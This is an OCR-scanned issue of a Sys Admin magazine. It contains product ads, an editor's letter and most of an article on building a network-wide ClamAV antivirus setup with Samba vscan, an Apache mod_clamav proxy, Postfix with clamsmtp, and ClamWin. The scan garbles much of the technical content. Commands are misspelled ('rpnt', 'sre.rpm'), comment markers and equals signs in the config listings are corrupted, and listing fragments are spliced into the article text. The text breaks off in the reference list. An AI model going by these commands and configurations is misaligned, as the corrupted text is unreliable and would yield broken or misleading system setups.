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UNIX/Linux Account Management 


was stuck using NIS, foolin’ around with LDAP. 

User synchronization and security 
problems all over the place. 


Does a simple solution for 

enterprise UNIX/Linux 
account management 

exist in the real world? 
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Introducing Symark PowerPassword", User Management Edition, the simple, secure 
alternative to NIS, NI5+, and even LDAP, for central UNIX/Linux account management. 
One solution for user account, password and login management for all of your data 
center UNIX and Linux platforms. No conflicts. No overhead. No hassles. 


PowerPassword User Management Edition 


• Centralized account deployment 
to any host 

• Automatic UID/GID synchronization 

• Highly secure password policies 

• Login access control to any host, 
by user, group, time, method 

• Detailed Reports for UNIX/Linux 
Audits and Regulatory Compliance 
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To see the full benefits of PowerPassword L 
User Management Edition visit our website 

at www.symark.com or call us at 800-234-9072. 

Act now to receive specially discounted Starter Pack 
pricing on your initial purchase. 


Supports over 25 different UNIX and Linux platforms-. 


HP Tru64 UNIX 5 la. 5.1b 

Debian GNU/Linux 3.0 

Digital UNIX4.GF, 4.QG 

HP-UX 11.00 and 11 i 32/64 bit IBM 

RS/6000 AIX 5Lv5.1. v5.2 _ 

Red Hat Enterprise Linux 3 ix86, 
32-bit) 


Sun SPARC Solaris 2.5.1, 2.6 
Sun SPARC Solaris 7. 8, 9 
Sun x86 Solans 7. 8. 9 
SUSE Linux 7.3. 8.0, 8,1 
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Not just secure. Symark secure. 
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The Sentinel32 is now available with an optional 100 Base FX fiber interface permitting users to access servers 
and devices on a network up to 10 kilometers (6.2 miles) away as if they were on the local network. 

The 100 Base FX option also allows the Sentinel32 to be connected directly to a fiber optic backbone 
without the need of a media converter, thus eliminating a potential point of failure. 



^Sun 
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Solaris- 

Ready 


SENTIMEL32 SECURE console server 

Designed specifically for mission critical server applications with superior redundancy and reliability features! 


It 


■Hot Swappable Dual Power Supplies 
■Hot Swappable Interfaces 
■Full Distribution Linux (not embedded) 

■Dual NICs with Network "Port Bonding/Trunks 
■Dual Console Ports 
■OpenSSH, OpenLDAP, NIS, TACACS+ 

■SSH Direct to Port/IP Option 
■Sun Break-Safe "Solaris Ready" 

>100 Base FX Fiber Network Connectivity Option 
’ -48 Volt Models Available 


LOGICAL 

SOLUTIONS 


Visit our website 
to compare our features 
with those of 
our competitors. 

Then make the Logical Choice! 
www.thinklogical.com 





Corporate Office: 

100 Washington Street 
Milford, CT 06460 
TEL [203] 647-8700 
FAX [203] 783-9949 


Best Features, Best Support, Lowest Prices! 


CALL 

800-291-3211 

AND TALK TO A LIVE PERSON 



USA 


EMAIL info@thinklogical.com 


ThirskLogical, com 


























The first issue of the new year is typically the one we dedicate to open source 
topics. This issue is no exception, and it features articles describing open source 
tools that, among other things, scan your network for viruses, perform disk-to-disk 
backups, enforce IP access policy, and distribute DNS data to multiple servers. 
Also in this issue. Bryan Smith begins a two-part article examining the terms open 
and proprietary, which are generally used to categorize software. He proposes new, 
more distinct labels and assesses the associated deployment risks of the various 
types of software. 

If you’re interested in following other open source vs. proprietary battles, the 
Groklaw site at: http://www.groklaw.net provides daily updates and commen¬ 
tary along with historical perspective on the machinations surrounding the SCO 
controversy and related issues. It’s worth a moment to check out the current state 
of affairs there. 

SysAdmin magazine recently adopted a new online look. I invite you to visit the 
Sys Admin Web site at: http://www.sysadminmag.com and see what you think. 
We're still fixing a few trouble spots, so be sure to send feedback if you see broken 
links or other problems. We’re in the process of converting UnixReview.com to this 
new' format as w'ell. so look for it to be updated in the near future. 

Also, just in time for holiday shopping. Version 10 of the Sys Admin back issue 
CD-ROM is now available. It includes complete articles and code from the mag¬ 
azine’s premiere issue in 1992 through December ot 2004. It also includes The 
Per! Journal archives from 1996 through 2002 and offers both HTML and ASCII 
versions of the content. As in the past, a few articles do not appear on the CD 
either because we couldn't track down the authors to request permission or 
because they chose not to have their content included. The back issue CD can be 
ordered online through the Sys Admin Web site for $49.95 ($24.95 for registered 
owners of the previous version). See page 58 for more information. 

If you’d like to see an article of yours included in a future SysAdmin CD, you 
can begin by sending a manuscript proposal to our managing editor. Rikki 
Endsley, at: rends 1 ey@Cf!ip.com. Currently, we’re looking for articles on spam 
management, clustering, remote access, and database management, but other 
topics w'ill be considered. Please send questions or comments to Rikki or to me 
at: aankerhol z@cmp.com. 

Sincerely yours. 

Amber Ankerholz 

Editor in Chief 
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Linux + Disks + Ethernet = EtherDrive® 


Disks go inside servers, right? If you run out of disk space 
you get another server...right? Well, that used to be the 
case, but not any more. Now you can use Coraid Ether- 
Drive storage blades and expand the disk space on any 
server. 


EtherDrive Storage Blades insert into a shelf of 10 slots. 
This means you can have 4TB in one 3U of rack space. 
You can add up to 4,096 shelves on a single network. That 
means you can have servers sharing 16 Petabytes. Imag¬ 
ine that. 


The Coraid EtherDrive Storage Blades are simple and 
easy to use. And the best part is, you already know how. 
An EtherDrive Storage Blade is a disk drive mounted on a 
very small server attached directly to your network. Each 
server, called a nanoserver, has firmware that puts the 
disk's storage right on your server. No IP addresses. No 
logging into a funky web server. Just disks on your serv¬ 
ers. 

Just Disk Drives on Ethernet 

Our open protocol, ATAoverEthernet, allows the most in 
flexibility and simple operation. The best part is, since they 
just look like local disk, you already know how to use them. 
Use any file system software. Use any RAID software.Use 
any volume managment software. It’s all up to you to 
decide how to organize your disks. And, since our protocol 
is open, you know everything about the whole shooting 
match. The protocol is simple, only 8 pages. Our open 
source device driver means you never have to look at the 
protocol. But isn’t it good to know you can? 

Complete Control 

You have complete control over the contents of the disk. 
No funny stuff here. We don’t store anything on your disks 
that you don’t want us to. You can take a disk from a run¬ 
ning system, mount it on a EtherDrive Storage Blade, and 
mount it. That means you are always in control. No refor¬ 
mating. No captive data. Just disk drives on the network. 
You never have to worry about getting your data off of a 
EtherDrive Blade it it fails. Just mount the disk on a system 
or another Blade and you’re back in business. 


40,000 Disks on your servers 

A system that can go from a couple of disks, all the way to 
40,000 disks. In what ever increment you want. That’s prob¬ 
ably more than you’ll ever need, but isn’t that the idea? To 
never run out of expandability. Since our shelves mount in 
simple relay racks just like your switches, you never run out 
of room. Never have to junk a box just because you can’t 
get modules. Never have to fork lift obsolete systems. 
Never have to buy more servers when all you want is more 
disks. 

Processing Power with Each Blade 

The blades can go fast, too. Since each disk has its own 
cpu, memory and Ethernet interface, they all work in perfect 
unison. Striping software will read blades in parallel. The 
wider the stripe, the faster the 10. 

Each Blade isn't limited to a single server, either. A set of 
servers can access the same group of EtherDrive Storage 
Blades. They can share read only file systems. They can 
use already available software like RedHat’s GFS to share 
file systems. And it won't break the bank either. Using Et¬ 
herDrive Storage Blades you only add pennies to the cost 
of the raw storage. Only $.71 per Gigabyte. 


www.coraid.com 

info@coraid.com 

1-877-548-7200 












SECURITY 


Open Source Anti-Virus for the Whole 
Network: ClamAV 

James Mikusi 


U ntil recently, there was not a strong open source presence in 
the anti-virus realm. Now, however, there is more than one 
project in this arena, anti the ClamAV project in particular 
is proving its ability to provide software scanning in a way that's 
adaptable and effective. 

In the spirit of the Unix philosophy. Doug Mcllroy said, ‘‘Write 
programs that do one thing and do it well. White programs to work 
together." ClamAV demonstrates just how effective this model con¬ 
tinues to be. The ClamAV engine simply filters any input given and 
outputs a basic summary stating whether a virus was detected. This 
simplicity makes it appropriate for scanning content on a local file 
system, network tile system, Web proxy, mail gateway, or whatever. 
Simply send it input and get a yes/no result. 

ClamAV Features 

When weighing the effectiveness of anti-virus software, two 
features must he considered. The first aspect is the frequency and 
timeliness of virus database updates. This is an area of strength for 
open source collaboration because virus database updates are 
made continuously by the project's maintained with help from the 
Internet community in general. The ClamAV project hosts a Web 
form where new virus discoveries can be posted and inspected by 
the virus database maintainers and added to daily.cvd publications if 
appropriate. On occasion, the ClamAV project has even been the 
first to identify new viruses and thus bestowed the right to name the 
virus. In my opinion, this global contribution to the virus database 
makes ClamAV a force to be reckoned with. 

The second consideration is the performance of the scanning 
engine. How long do scans take? Are viruses detected pre-infection? 



Are suspicious files with virus-like actions, but not in the definition 
database, treated like viruses for protection? In this aspect, the 
ClamAV "suite" performs excellently, too. It's a simple, straightfor¬ 
ward scanning engine. 

When setting up ClamAV, be sure you use the most recent 
code (1). As the project has advanced, there have been changes to 
the virus database definition formats that require using the most 
up-to-date software distributions to make sure the most recent 
virus definitions are effective. The ClamAV FAQ says: 

You'll get la ClamAV installation is OUTDATED] message when¬ 
ever a new version of ClamAV is released. To detect all the latest 
viruses, it’s not enough to keep your database up to date. You also 
need to run the latest version of the scanner. You can find the latest 
release at http://www.clamav.net under the stable link. Running 
the latest stable release also improves stability. 

The Dissection 

The ClamAV home page is http://www.clamav.net. The pro¬ 
ject is hosted on SourceForge where official releases or snapshots 
may be obtained. Check the “3rd Party Software" link on the home 
page to find an RPM binary that can even be obtained via yum 
install cl amav with the appropriate entries in /etc/yum.conf (2). 

As of this writing, the current version of ClamAV is 0.80-1. This 
article will concentrate on RPM distributions where available for 
their ease of installation and updates. If not using yum (or similar), 
obtain both clamav-0.80-l.i386.rpm and clamav-devel-0.80- 
l.i386.rpm — the latter being necessary only for compilation of 
mod_clamav.so and vscan-clamav.so (discussed later). Install both 
RPMs with rpm -ivh. 

Two parts make up the engine of ClamAV: clamd, the scanning 
daemon, and freshclam, the virus database update retrieval tool. By 
default, ClamAV keeps its virus definitions in /var/lib/clamav with two 
definition files: maiiLCvd and daily.cvd. The file /etc/freshclam.conf 
controls the basics of the freshclam process, which downloads the 
two abovementioned definition files and alerts the clamd engine to 
reload the virus definitions. Later in this article. I will describe how 
to create a local virus definition server. 

The frequency of the freshclam daemon should be directly 
related to how much traffic flows in and out of any given network. 
In small office environments. I find two updates during the workday 
ease my mind. High-traffic sites or paranoid admins may want to 
consider hourly updates. The only other out-of-the-box edit to make 
for virus database updates is to point a regionally local update 
server: 

Databasesrror db.XY.clamav.net it XY = country code. 1e: US for us. 
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An RPM install will default to running freshclam in daemon mode 
with daily updates run as the user defined by DatabaseOwner. 
which should be claniav. This is necessary because only the user 
clamav should be able to read/write the virus database definitions in 
/var/lib/clamav. The number of updates per day can be controlled 
via the freshclam option -Checks=X. where X is number of times 
per day. 

The second part of the work is done by the clamd daemon, It can 
operate in either of two modes; unix socket or lep socket. Either of 
the following configuration directives from /etc/clamd.conf controls 
this behavior. Choose one! ClamAV can’t listen to both Unix and 
network sockets concurrently. Unless using a central virus scanner 
server, the first option is preferred: 

Local Socket /var/run/clamav/clamd.sock # UNIX socket owned by clamav 

Or: 

TCPAddr 127.0.0.1 

TCPSocket 3310 # default port 

If a dedicated scanning server is used for the whole network, then 
setting TCPAddr to the address of a network interface is necessary. 

The default working directory is /tmp, hut it can be changed with 
the following directive: 

TemporaryDirectory /tmp/clamav # setting used for this article 

Other configuration directives allow the control of logging, scanning 
of mail files, scanning of archives (zip and rar files), and reaction to 
detected viruses. (Note: the developers warn that the RAR library 
leaks and necessitates regular restarts of clamd if it is turned on with 
ScanRAR). Detected viruses may simply cause ClamAV to return 
its findings, but these files can optionally be quarantined, deleted, 
and/or cause notifications to be sent to admins. I he VirusEvent 
directive lakes any command as an argument and allows virus 
response to be configured to your heart’s desire. For example: 

VirusEvent sendemai1 pip@foo.bar "Found ?v." 

# my custom script "sendemail” 

where %v is replaced with the virus name. See the cl amd.conf man 
page for a full listing of configuration options. 

In Action 

The most basic virus scan can be made with the cl ainscan exe¬ 
cutable included in the distribution. When run on a Unix client 
where the clamd daemon is running (in either Unix socket or net¬ 
work mode), it takes filenames, directories, or standard input as 
arguments and scans them tor viruses. While a simple summary 
with findings is dumped to standard output, the clamscan process 
simply returns 0 for no detection. 1 for a detected virus, and any 
other positive number identifying an error in processing. 

One thing to keep in mind while working with ClamAV is per¬ 
missions. The ClamAV installation defaults to creating the user 
clamav. This is the user name assumed by clamd and freshclam. 
the owner of virus database files, and quarantine directories. Not 
getting scan results? Make sure the requesting process can 
read/write the domain socket. Verify /var/run/clamav/clamd.sock 
has permissions 777 and /tmp/clamav permissions of at least 770 
and that both files are owned by uid clamav, gid clamav. 


Perimeter Scanning 

If using a Samba file server, then ClamAV can use vscan-clamav 
(from the samba-vsean project) via the VFS interface of Samba. 
Although this is said to work with Samba v2.2, the procedures 
here were achieved with Samba v3. This utility is not yet avail¬ 
able as an RPM, so the source code needs to be downloaded. The 
first thing necessary to compile the vscan-clamav module is the 
Samba source code. We'll get everything we need here from 
samba-3.0.7-l.src.rpm (3). Run the following to make the RPMs 
and extract the source (this step is necessary even if you already 
have a Samba binary installed since compilation of samba-vsean 
requires the Samba source and make proto run within): 

rpmbuild --rebuild samba-3.0.7-1.sre.rpm 

For Red Hat 9.0. this leaves the produced RPMs in 
/ usr/src/redh at/RP M S/i386: 

rpnt -Uvh /usr/src/redhat/RPMS/i386/samba-3.0.7-1.1386.rptn 

Then, to get the sources to build samba-vsean against: 

rpm2cpio samba-3.0.7-1.sre.rpm j cpio -i samba-3.0.7.tar.bz2 
tar xjf samba-3,0.7.tar.bz2 
cd <saniba-source-root>/source 
./configure; make proto 

samba-vsean doesn’t yet come in RPM form, so obtain 
samba-vscan-0.3.5.tar.bz2. The module needed can be produced as 
follows: 

tar xjf samba-vsean,0.3,5.tar.bz2; cd samba-vscan-0.3.5 
<editor-of-choice> clamav/vscan-clamav .h # if customizations are 

# desired 

./configure --with-samba-source=<samba-source-root>/source 
make clamav 

cp vscan-clamav.so /usr/lib/samba/vfs/ # or the 1ib/samba/vfs \ 
location for your installation 

The Samba source directory must be referenced via 
-with-samba -source. Successful compilation of samba-vsean will 
produce the file vscan-clamav.so in the current directory — not the 
clamav/ directory. The last copy command puts the module where 
Samba can use it. As run on Red Hat 9.0, the make clamav stage 
will produce numerous warnings regarding the production of 
.po files and undefined references. Despite the discomfort they 
produced, they didn’t seem to interfere with the production of 
vscan-clamav.so and its ability to work with Samba. After com¬ 
pilation. copy the config files into place: 

cp clamav/vscan-clamav.conf /etc/samba/ 

Next, make the following addition to the global section of the 
smb.conf file (or just to specific share definitions to virus-scan only 
some shares): 

vscan-clamav: config-file = /etc/samba/vscan-clamav.conf 
vfs object - vscan-clamav 

This vscan-clamav .conf file controls the behavior of Samba and 
its reaction to infected files. Its most noteworthy directives follow. 
Of these, note that a file can be scanned both when a user requests to 
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open il AND to dose it. This may appear redundant but consider a 
situation where an infected client computer opens a file for editing, 
has a virus infect the local working copy, and then writes it to the 
tile server on close. Also, if choosing to quarantine infected tiles for 
later inspection, the file name may be prepended with a string for 
easy identification: 

clamd socket name - /var/run/clamav/clamd.sock if tell it where 

if clamd listens. 

scan on open= yes 

scan on close = yes 

deny access on error = yes 

deny access on minor error = yes if iron fist. 

send warning message = yes if use windows messaging to notify the 

if user when viruses are found. 

if only necessary if keeping viruses for later inspection, 
ifmake sure this directory is NOT public or shared via samba! 
quarantine directory = /tmp/clamav 
quarantine prefix = VIRUS_INFECTED- 

If Windows clients are not running the Microsoft messaging server 
process (which often is not necessary or desirable in its own regard), 
the error message sent by the '‘deny access on error" directive won’t 
he able to notify the client why a file can't be opened. Instead, the 
user will receive a local error about reading the file tantamount to 
the file being corrupted. This can be confusing and frustrating to 
end users. Also note that if Samba can't contact the clamd process 
daemon for some reason, it will also gener¬ 
ate an error. 

The beauty of the samba-vsean imple¬ 
mentation is that tiles are scanned and 
detected even before users can open them. 

Using ClamAV as part of a full anti-virus 
network solution helps prevent viruses 
from ever reaching the desktop — ignoring 
removable media. With proper IT policy, it 
would be very difficult for infections to 
spread in your network. 

mod_clamav Apache 
Module 

I covered protecting file servers, but 
now I’ll concentrate on scanning in-bound 
and out-bound data — the first being Web 
content. The first thing needed is the ever 
popular Apache Web server with module 
support (DSO. mod_proxy, and the source 
distribution file tnod_clamav-0.21.tar.gz 
(4). The creation of the module mod_cla- 
mav is a simple matter of ./configure; 
make; make instal 1; this will require the 
availability of the Apache apxs utility. If 
it's not auto-delectcd, then its location can 
be specified with the -with -apxs com¬ 
mand-line option when running ./configure: 

tar xzf mod_clamav-0.21.tar.gz 
cd mod_clamav-0.21 

./configure [--with-axps=/usr/sbin/apxs] 
make 


If you're not running an entirely RPM or deb-based system, then 
make instal 1 may work, but the defaults it assumes arc not correct 
in most cases. Find the produced module in ./.libs/mod_clamav.so 
and copy it to /ete/httpd/modules (or the server's module directory). 
Also copy safepatterns.conf to /etc/httpd/conf/. It saves the proxy 
the trouble of scanning unnecessary files. 

Now' it's time to modify httpd.eonf. mod_clamav will chain its 
actions onto mod_proxy in the <Proxy> specification. While 
proxy support can be added to a content serving server, the fol¬ 
lowing configuration file is intended to be used as a minimal 
standalone proxy/virus-scanning server. 1 prefer this method 
because it conforms to Unix philosophy referenced at the begin¬ 
ning of this article. Copy it and run it via /usr/sbin/httpd -f 
/etc/httpd/conf/httpd-cl aitiav -proxy ,conf (Listing 1). 

Note also the sethandler Cl amav mapped to the virtual direc¬ 
tory /clamav, which permits retrieving a status page from 
]Ttod_clamav and is useful for finding out whether it's up and running. 

Local Virus Database Server 

if you read the Apache config file closely, you'll have noticed a 
VirtualHost section. This simply adds the ability to serve the con¬ 
tent in /var/lib/clamav where the virus database definition files live. 
Via this method, and by adding "virusdb" to point to this host in 
your DNS configuration, it can serve the files main.evd and 
daily.cvd to other internal clients. Just point client installs of 
ClamAV to "your-virtualhost.yourdomain.com” as well as coordi¬ 
nate this with your DNS zone. 1 liked setting up a DNS record for 
■'virusdb.mydomain.com". 
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Mail Filtering 

There are a number of SMTP projects using ClamAV. but I chose 
clamstmp for this article because it’s available as an RPM (or just a 
.spec to build your own RPM) and because its design lends itself for 
usage in most any mail server software. Essentially, it runs as a 
standalone (mail) server accepting mails on a listening socket, scans 
them for viruses via clamd, and then sends them back to the deliver¬ 
ing mail server on some other socket. The project's homepage states 
that it was designed with Postfix in mind, which will be covered 


Listing 1 / etc/httpd/conf/httpd’dama v-proxy. conf 

ServerTokerts OS 
ServerRoot "/etc/httpd" 

PidFile rim/proxy-clamav-miniTnal.pid 
Timeout 300 
KeepAlive On 

MaxKeepAliveRequests 100 
KeepAliveTimeoot 15 
User clamav 
Group clamav 

ServerAdmin admir@yourdomain.com 
ServerName proxy.yourdomain.com:8080 
UseCanonicalName Off 

Access Filename .htaccess it if access control is desired 

# proxy requests 
Listen 192.168.1.9:8080 

it use default web port for client virusdb requests 
it make sure DNS is updated to use this! 

Listen 192.168.1.140:80 

it Dynamic Shared Object {DSO) Support 
§ just the one’s necessary for a virus scanning proxy. 

it 

it mod_access is only needed if requiring user authentication to proxy 
it server 

LoadModule accessjrodule modules/mod_access.so 
LoadModule log_config_module modules/mod_log_config.so 
LoadModule vhost_aliasjnodule modules/mod_vhost_alias.so 
LoadModule proxyjnodule modules/mod_proxy.so 
LoadModule proxyjittpjnodule mcdules/mod_proxy_http.so 
LoadModule clamav_module modules/mod_clamav.so 

it 

it Proxy Server directives. 
it 

<IfModule mod_proxy.c> 

ProxyRequests On 
AllowCONNECT 8080 

<Proxy *> 

it make sure content gets filtered! 

SetOutputFiIter CLAMAV 
Order deny,allow 
Deny from all 
it your local subnet 
Allow from 192.168.1. 
it or if you prefer 
)/ Allow from yourconipany.com 
</Proxy> 

ProxyVia On 

it To enable the cache as well, edit and uncomment the following lines: 
it (no cacheing without CacheRoot) 

it 

(/CacheRoot ’Vetc/httpd/proxy" 

(/CacheSize 5 
#CacheGclnterval 4 
#CacheMaxExpire 24 
#CacheLastModifiedFactor 0.1 
#CacheDefaultExpire 1 

j/NoCache a-domain.com another-domain.edu joes.garage-sale.com 
</IfModule> 

it End of proxy directives. 

ClamavTmpdir /var/tnp/clamav 


here. On the other hand, cheek the references at the end of the arti¬ 
cle because there may already be a project to suit your mail server 
specifics (5). For example, there is a clamav milter project for use 
with sendmail. 

Get the clamsmtp RPM (clamsmtp-1.0-1 .sre.rpm at the time of 
writing) and build it with: 

rpmbuild -rebuild clamsmtp-1.0.1.sre.rpm 
rpm -Uvh clamsmtp-1.0-1.1386.rpm 


ClamavDbdir /var/lib/clamav 

ClamavSafetypes image/jpg 
ClairtavMode daemon 

ClamavSocket /var/run/clamav/clamd.sock 
ClamavTricklelnterval 10 

ClamavTrickleSize 1024 

ClamavSizelimit 1000000 

if names for shared memory and mutex. Note that we don’t know exactly 
it what apache does in the background. However, we should make sure 
it that apache can create these files if necessary 
(/ClamavShm /usr/local/apache2/logs/claraav.shm 

i/ClamavMutex /usr/local/apache2/logs/clamav. lock 

it if the clamd daemon crashes, we will have a problem connecting to it. 
it while it’ll prevent web access, i’ll hear about it soon enough. 
ClamavAcceptDaenionproblem off 

LogLevel warn 

it we would laike to get a more complete log file 
ClamavExtendedLogging on 

LogFormat "Xt S!3Q4(clamav:status}n Xlc1amav:detailsin \ 

Xtclamav:virusnameln request-\"Xr\", status-XA. sent=X!304b, \ 
delay-X!3Q4D” clamav_stats 
CustomLog logs/clamav.scan_log clamav_stats 

LogFormat "Xh XI Xu It V’XrV X)s %b V’XlRefererji V’ \ 

\"%{User-Agent)icombined 
LogFormat "Xh XI Xu Xt \"Xr\” X>s lb" common 
LogFormat "X(Referer]i -> XU” referer 
LogFormat "X{User-agent)i" agent 
ErrorLog logs/proxy.error_log 
CustomLog logs/proxy.access_log combined 

it define the location for status information 
CLocation /clamav) 

SetHandler clamav 

order deny,al1ow 
allow from 192.168.1. 

</Location> 

it safe patterns is much better than ClamavSavetypes 
it also found in the distribution samba-vscan-src/clamav dir 
Include conf/safepatterns.conf 

§ we have a customized message in case we find a virus 
ClamavMessage "\ 

<!00CTYPE HTML PUBLIC \’*-//W3C//DTD HTML 4.0//EN\”>\ 

<html>\ 

<head>\ 

<title)Xi found virus</title>\ 

</head>\ 

<body text”\"#000000\" bgcolor-V’#ffffff\”>\ 

<basefont size-\"4\">\ 

<hl><center>Xi found virus</center></hl>\ 

<p>The virus <b>Xv</b> was found while downloading <i>Xu</i>.\ 

The transfer has been aborted.</p>\ 

</basefont>\ 

</body>\ 

</html>\ 

M 

<Virtu a 1 Host 192.168.1.9:80) 

ServerAdmin root@loca 1 host 
ServerName virusdb 
DocumentRoot /var/lib/clamav 
ErrorLog 1ogs/virusdb.error_log 
CustomLog logs/virusdb.access_log common 
</V1rtualHost) 
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The ralher short configuration tile, /etc/clamstmpd.conf, contains 
the following notables whose defaults are shown. It must specify 
two things for the implementation explained here: the address 
where to listen for scan requests, and where to send the results. 
Also, make sure /etc/clamd.conf has the ScanMail option enabled, 
so the clamd daemon knows to expect emails, too. 

This configuration assumes that Postfix, clamsmtp, and clamd 
all run on the same server. It uses the loopback address for commu¬ 
nication: 

OutAddress: 10026 # "ip: port" or just "port" 

# must coordinate with postfix master.cf 

Listen: 0.0.0.0:10025 

ClamAddress: /var/run/clamav/clamd.sock # make sore its not just "clamd" 
User: clamav 

VirusAction command /I your heart’s desire. Email, page, SMS, fax, ... 

Configuring Postfix is a simple matter of some edits to main.cf and 
master.cf. This is taken directly from the project's Web site. This con¬ 
figuration (Listing 2) can be cut and pasted into a Red Hat 9 default 
Postfix distribution in about two minutes for a working solution. 

Just make sure Postfix listens on the loopback address 
(main.cf: i net_interfaces = Smyhostname , local host) where 
clamsmtp defaults to sending its results if based on this configura¬ 
tion. Clamsmtp will receive its requests on 127.0.0.1:10025 from 
Postfix running on the same machine; ergo, it will send the filtered 
mail back on 127.0.0.1:10026. This default behavior comes from 
the OutAddress: 10026 config directive, which says send mail back 
to the IP address it came from on port 
10026. An IP:Port specification can be used 
here if needed. 

Also, clamsmtp defaults to dropping 
mail with positive virus scans. 1 find this a 
little discomforting in that I like the fact 
that email is reliable and never vanishes 
into the ether. Even when there are prob¬ 
lems, I'm confident it will bounce back. 

The maintainers have a strong argument in 
that virus-infected emails usually have false 
reply-to addresses anyway, so bouncing the 
mail is wasted effort and bandwidth. You 
decide. Change the default behavior of 
dropping virus infected mails by setting 
Bounce: on in clamsmtp.conf. 

It's also possible to add a header to 
the email after scanning and let local 
delivery agents, tike procmail, do their 
own thing. This is accomplished with the 
clamsmtpd.conf directive: 

ScanHeader: X-AV-Checked: ClamAV using 
ClamSMTP. 

Windows Clients: The 
ClamWin Port 

To make this project complete, there 
needs to be client-based scanner, which is 
tultilled by the ClamWin port. The core 
ClamAV project does distribute a Windows 
installer but without any GUI front-end. 

Maybe this is acceptable in the world of 
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Unix administration, but it’s not very friendly for the standard end 
user. Find the installer on the ClamWin homepage (6). 

One drawback of the current ClamWin installation should be 
noted — it doesn't support on-access scanning, which might make 
it better classified as a virus infection notifier rather than “anti"- 
virus prevention. As far as anti-virus software goes, this is very 
undesirable but is likely to change in future releases of this project. 
On a better note, it uses the same virus database files as the previ¬ 
ously described projects as well as scheduled scans, email notifica¬ 
tion, Outlook plug-in. a tray icon, and a Windows explorer plug-in. 

The ClamWin project distributes an installer that auto-detects 
the presence of Outlook and prompts for the option to install the 
Outlook plug-in during setup. When starting Outlook, there will 
then be a splash screen showing the ClamAV logo but no other 
noticeable difference. From installation forward, all Outlook in¬ 
bound and out-bound email will be scanned for viruses locally. This 
might be considered redundant if all the mail is going to a filtered 
gateway anyway, but it's probably a good idea nonetheless. If you 
have users that fiddle with POP3/IMAP or SMTP settings to check 
other accounts, then using the local filter is a good idea. Most desk¬ 
top stations these days are plenty over-powered for the typical office 
desktop user, so a few extra cycles spent scanning mail is harmless. 

Once installed, (here are two noticeable differences. First is an 
icon in the system tray, which brings up the main configuration 
interface when double-clicked. There are nine tabs that include con¬ 
figuration of the virus database server (use the local VirtualHost 
replicator described in the proxy section), email notification, and 


scheduling of scans. The second change occurs in Explorer, which 
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adds an option to the right-click context menu for scanning a single 
tile or folder. This is great for scanning recent downloads before 
executing them. 

Unfortunately, the installer at current (vO.35-2) doesn't support 
network deployment or easy replication of settings. The installer 
asks whether to install for the current user or All Users, but config 
files are per user in their “HOME\Application DefaultsVclamwin" 
folder (Win2K/XP) or “C:\Windows\Profiles\usemame\.clamwiri‘ 
(Win98). 

For small office installations, I've found it easy enough to 
configure one client, create the desired configuration, then copy 
the files Clam Win. con f and ScheduledSeans from C:\Documents 
and Settings\username\Application DataYclamwin to new client 
installations, but 1 put them in C:\Program Files\ClamWin\bin (as 
opposed to a single user's configuration directory) where they 
will be copied as defaults for new users on first logins. Large 
installations might want these files maintained via policy files or 
as read-only files in their home directories. This is a trivial task if 
you're already using Samba for network logins. 

Reference should also be made to the need for the COM_SPEC 
environment variable in ClamWin. This variable references the 
command.exe (Win98) or cmd.exe (Win2K, WinXP) command 
prompt (or DOS shell). This variable is usually set on Win98 and 
WinXP clients, but I found some Win2000 machines where it was 
not set. If not, it can easily be added to your system variables. (In 
WinXP. it’s been renamed “ComSpec") 

Testing: Is It Working? 

It's installed, but is it doing its job? It’s not practical to pass 
known viruses around the network just to see if tools are doing 
their jobs, thus the European Institute for Computer Anti-Virus 
Research (EICAR) provides a good solution. They’ve come up 
with the idea of a text file w hose signature is generally accepted by 
most anti-virus packages to trigger a positive virus finding. It's dis¬ 
tributed in several forms, including within doubly zipped archives 
at http: //www, eicar.com/anti_virus_test_file.htm. This link 
itself will trigger mod_clamav/mod_proxy and block the page from 
loading. 

This is not proof of full virus protection but rather a trigger to 
ClamAV to see whether the software is installed and functioning. 



Listing 2 Postfix master, cf edits 

Put the following lines in your Postfix main.cf file: 


content_fiIter = scan:127.0.0.1:10025 

receive_override„options _ no_address_mappings 

The cortent_fi1 ter tells Postfix to send all mail through the service 
called ’scan' on port 10025. We’ll set up clamsmtpd to listen on this 
port later. 

Next we add the following to the Postfix master.cf file: 

f AV scan filter (used by content_fiIter) 
scan unix - - n • 16 srrtp 

-o smtp_5end_xforward_command=yes 
# For injecting mail back into postfix from the filter 
127.0.0.1:10026 inet n - n - 16 smtpd 

-o content_filter= 

•o 

receive_overrlde_options-no_unknown_recipient_checks,no_header_body_checks 
-o smtpd_helo_restrictions- 
-o srfitpd_client_restrictions= 

-o smtpd_sender_restrictions= 

■o smtpcLredpient_restrictions-permitjnynetworks,reject 
-o mynetworks_style=host 

-o sintpd_authorized_xforward_hosts=127.0.0.0/8ServerTokens OS 


Full proof of concept would be provided by "unbiased" third parties 
such as http://www.virusbulletin.C0ir/ (7). Since having soft¬ 
ware evaluated by such an institution requires subscription fees, and 
most open source projects don’t have such a budget, it's not likely 
this will happen for ClamAV in the immediate future. It might hap¬ 
pen when ClamAV becomes more widely used and a full test 
against commercial packages is commissioned. I hope articles such 
as this one will advance ClamAV down this path. (Check out the 
“who’s using it" link on the homepage for more information.) 

What Next? 

Open source software has come a long way in the past decade 
from being a midnight hacker's favorite toy to a financial institu¬ 
tion's budget saver and performance enhancer. While Linux, 
Apache, sendmail. BIND. Perl, and the like have filled the spectrum 
of open source software benchmarks, there has been a void in virus 
protection until the emergence of ClamAV and similar projects. 

ClamAV’s model follows the Unix philosophy — it scans for 
viruses, nothing more and nothing less (8). Its sole intent is to do 
this well and let projects like mod_proxy and clamstmp provide 
support for connecting to other services. Likewise, 1 find my 
favorite software packages to be those with wide support networks, 
such as Perl-CPAN and Apache-modules. If these are any signs of 
what gives software longevity, then ClamAV is well on its way to 
wide acceptance. 

The curious might want to look at the sigtool application dis¬ 
tributed with ClamAV. which is used to manage the virus database 
files. It's trivia] to open a cvd file and grep the text definition files 
for a virus name and signature. You might even find occasion to 
add your own signatures to have certain files treated like viruses. 
For instance some admins don't want file sharing apps making it to 
the desktops. Also worth noting is the libclamav library, which 
provides a completely different option for linking programs with 
ClamAV (sumba-vscan can use this option). 

Lastly, you can help out! This project has become so successful 
because of its large contribution base. Make it even better by adding 
yourself to that list (9). If you find a new virus, submit it to the data¬ 
base via the link on the home page. This spirit and mentality could 
potentially halt viruses for good! 

Resources 

1. ClamAV home page — http://WWW.C1ama v .net/ 

2. Third-party software information — 

http://www.clanav.net/3rdparty.htinl 

3. Samba source — 

http://www. openantivirus.org/projects.phpffsatnba-vscan 

4. Mod_clamav source — 

http://software.othello.ch/mod_clamav/ 

5. Clamsmtp — 

